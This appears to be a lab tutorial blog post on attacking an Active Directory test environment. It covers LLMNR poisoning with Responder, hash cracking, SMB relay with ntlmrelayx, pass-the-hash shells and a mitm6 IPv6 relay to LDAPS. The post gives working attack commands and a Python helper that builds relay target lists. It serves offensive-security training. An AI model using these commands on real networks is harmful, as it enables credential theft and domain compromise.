AD Attack Lab Part Two (LLMNR poisoning, SMB relay, and IPv6 attack)

Arthur Reeder

In part two of the AD attack lab series, we will learn how to perform LLMNR poisoning, SMB relay, and an IPv6 (mitm6) attack against the AD environment. If you do not have the AD environment set up yet, go to “AD attack lab part one” and follow the instructions to set the lab up. Note, I have changed my VM specs for this lab. There are now 4 VMs: Windows Server 2019 (the domain controller), Windows 10 (2x), and Kali 2020.3. Each VM is assigned 1 GB RAM and 1 processor, and all of them use the NAT network. If you do not have Kali installed yet, head over here to grab the latest version. Now, let’s dive into the lab setup.

Install Impacket

wget https://bootstrap.pypa.io/get-pip.py
sudo python get-pip.py
wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
tar -xzf impacket-0.9.19.tar.gz
cd impacket-0.9.19/
pip install .
sudo pip install .

Note, we will use Impacket 0.9.19 in this lab because of compatibility issues with some of the tools we are going to use. Also notice that Python 2.7 is used to run get-pip.py, so the resulting pip installs packages for Python 2.7. The generic get-pip.py at bootstrap.pypa.io dropped Python 2 support in 2021; on a current system fetch the 2.7-specific script from https://bootstrap.pypa.io/pip/2.7/get-pip.py instead.

Perform LLMNR poisoning

Start all 4 VMs. In Kali, start Responder on eth0 (the interface facing the lab network) in verbose mode. On one of the Windows 10 clients, log in and try to open a network share that does not exist, for example by typing a mistyped server name into the Explorer address bar. This simulates a user mistyping a network drive: the DNS lookup for the bogus name fails, Windows falls back to LLMNR and NBT-NS broadcasts asking “who is this host?”, and Responder answers that it is. The client then authenticates to Responder over SMB with NTLM, handing over its NetNTLMv2 challenge-response, which Responder prints as a crackable hash. Note, 192.168.200.160 is the IP of Kali.

  • Start Responder (-I selects the interface, -w starts the rogue WPAD proxy, -v is verbose)

sudo responder -I eth0 -rdwv

  • Access the Kali machine (or any non-existent share name) from Windows 10

Note, if your computers are not visible in the network, go to “Services” and start “Function Discovery Resource Publication”. This only affects browsing; the poisoning itself works as soon as a name lookup falls back to LLMNR or NBT-NS.

  • Save the NetNTLMv2 hash line in a file and crack it with Hashcat (mode 5600) against the “rockyou” wordlist

We see the Administrator’s password is “password”.

SMB relay

  • Run an Nmap scan to see which hosts do not require SMB signing (domain controllers require it by default; workstations and member servers usually do not)

sudo nmap --script=smb2-security-mode.nse -p445 192.168.200.0/24

  • Turn off the SMB and HTTP servers in the Responder configuration file (Responder.conf), so that Responder only poisons name requests and the actual SMB/HTTP connections reach ntlmrelayx.py instead
  • Start Responder and “ntlmrelayx.py” on the Kali machine, giving ntlmrelayx a targets file containing only hosts where signing is not required

Now, when a client authenticates to Kali, ntlmrelayx relays that NTLM authentication to a target in the list instead of capturing it, and by default uses the relayed session to dump the target's local SAM hashes. This only works when the relayed user is a local administrator on the target, and the authentication cannot be relayed back to the host it came from, so a target that is not the poisoned client is needed.
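Picking relay targets by hand from the Nmap output gets error-prone with more than a few hosts, so here is an added helper (not part of the original post or of Impacket) that parses the normal Nmap output of the smb2-security-mode script and produces a targets file for ntlmrelayx.py. The sample output is constructed to mimic the script's layout: the DC (192.168.200.153) and Kali (192.168.200.160) addresses come from the lab, while the two client addresses 192.168.200.161 and 192.168.200.162 are assumed here and not given on the page.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample in the layout nmap prints for --script=smb2-security-mode;
# hosts, latencies and signing states are made up for the lab.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for dc01.kudos.local (192.168.200.153)
Host is up (0.00031s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required

Nmap scan report for 192.168.200.160
Host is up (0.000020s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap scan report for 192.168.200.161
Host is up (0.00040s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required

Nmap scan report for 192.168.200.162
Host is up (0.00044s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# Matches both "Nmap scan report for 1.2.3.4" and "Nmap scan report for name (1.2.3.4)".
_HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")


def parse_smb_signing(nmap_text: str) -> Dict[str, str]:
    """Map each scanned IP to 'required', 'not_required', or 'unknown' (no script output)."""
    result: Dict[str, str] = {}
    host = None
    for line in nmap_text.splitlines():
        m = _HOST_RE.match(line)
        if m:
            host = m.group(1)
            result[host] = "unknown"
            continue
        if host and "Message signing" in line:
            # "enabled but not required" and "disabled and not required" are both relayable
            result[host] = "not_required" if "not required" in line else "required"
    return result


def relay_targets(nmap_text: str, exclude: Iterable[str] = ()) -> List[str]:
    """Hosts without mandatory signing, minus hosts you must never relay to: your own
    box and the host whose authentication you expect to relay (NTLM cannot be reflected
    back to its own origin host)."""
    excluded = set(exclude)
    ips = [ip for ip, state in parse_smb_signing(nmap_text).items()
           if state == "not_required" and ip not in excluded]
    return sorted(ips, key=lambda ip: tuple(int(o) for o in ip.split(".")))


def write_targets_file(path: str, ips: Iterable[str]) -> None:
    """One target per line, the format ntlmrelayx.py -tf expects."""
    with open(path, "w") as fh:
        fh.write("\n".join(ips) + "\n")


if __name__ == "__main__":
    targets = relay_targets(SAMPLE_NMAP_OUTPUT, exclude=["192.168.200.160"])
    write_targets_file("targets.txt", targets)
    print("relay targets:", targets)
```

Feed a real scan with `nmap --script=smb2-security-mode.nse -p445 192.168.200.0/24 -oN scan.txt` and pass the file contents to `relay_targets`. In this lab the DC drops out of the list because it requires signing, which is exactly why the relay is aimed at the workstations.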

Shell Access via SMB relay

Instead of dumping hashes, ntlmrelayx.py can keep the relayed SMB session open as an interactive shell (its -i option) that we connect to locally. From that shell we can browse the target's administrative shares, including C$ and ADMIN$.

  • Obtain a shell via Metasploit

Use the following module and set its options as the image shows, supplying the local Administrator's NTLM hash dumped by the relay instead of a password (pass-the-hash):

  • Obtain a shell via Impacket's “psexec.py”, again passing the dumped hash with its -hashes option instead of a password

IPv6 Attack via MITM6

  • Install mitm6

Note, the image shows I used Python 3, but I changed to Python 2.7 later.

  • Install the LDAPS certificate on the server (add the Active Directory Certificate Services role on the domain controller so LDAP over TLS on port 636 is available; ntlmrelayx needs LDAPS for the write operations it performs, such as creating a computer account)

Note, if you cannot connect to LDAPS, try troubleshooting. I had to roll back to an earlier snapshot and re-install the CA role, because for some reason my LDAPS wasn’t installed the first time.

  • Start “mitm6” and “ntlmrelayx.py” at the same time, in two terminals

mitm6 -d kudos.local
sudo ntlmrelayx.py -6 -t ldaps://192.168.200.153 -wh fakewpad.kudos.local -l lootme

mitm6 answers the clients' DHCPv6 requests, making Kali their IPv6 DNS server, so that Windows (which prefers IPv6) sends its name lookups to us; it then resolves the WPAD name to Kali. ntlmrelayx listens on IPv6 (-6), serves the fake WPAD host (-wh fakewpad.kudos.local), and relays the resulting NTLM authentications to the domain controller over LDAPS (-t ldaps://192.168.200.153), writing enumerated domain information to the lootme directory (-l). When a domain admin authenticates through the relay, ntlmrelayx can additionally create a new user and grant it privileges in the domain; the relay to the DC happens once a user logs in or reboots, so be patient in the lab.

In this post, we learned how to use LLMNR poisoning, SMB relay, and an IPv6 attack against a misconfigured AD environment. In the following posts, I will continue to discuss other ways to enumerate and attack the AD environment. Thank you for reading :)
